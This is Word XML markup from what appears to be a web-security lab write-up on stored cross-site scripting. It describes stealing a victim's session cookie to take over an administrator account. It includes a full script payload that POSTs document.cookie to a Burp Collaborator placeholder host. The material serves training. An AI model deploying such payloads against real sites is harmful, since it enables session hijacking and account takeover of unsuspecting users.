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E4F71D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exfiltrate the victim’s session cookie and then use this cookie to impersonate that victim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0FA435BE" w14:textId="166D333D" w:rsidR="00A062A5" w:rsidRPr="00F24ADA" w:rsidRDefault="00A062A5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force the application to make a POST HTTP request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Collaborator Client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420059B" w14:textId="4D1A62F8" w:rsidR="00F24ADA" w:rsidRPr="00F24ADA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get a couple of requests but we need to observe the HTTP request only and we’ll find a session cookie there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4906B7" w14:textId="0844DBB6" w:rsidR="00F24ADA" w:rsidRPr="005C275F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Copy the session cookie from there and try to replay the my-account request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tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6B568" w14:textId="16451130" w:rsidR="005C275F" w:rsidRDefault="005C275F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Congratulations, we managed to break in the administrator’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2AF10A" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB747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22F355A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0C051A3" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08C1D8" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'https://BURP-COLLABORATOR-SUBDOMAIN', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440136F6" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA65DBF" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>mode: 'no-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267552E" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>body:document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="013BBC07" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F35DD2" w14:textId="6BA904D3" w:rsidR="007C289E" w:rsidRPr="00921403" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;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62A5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2023-09-13T11:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-13T12:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>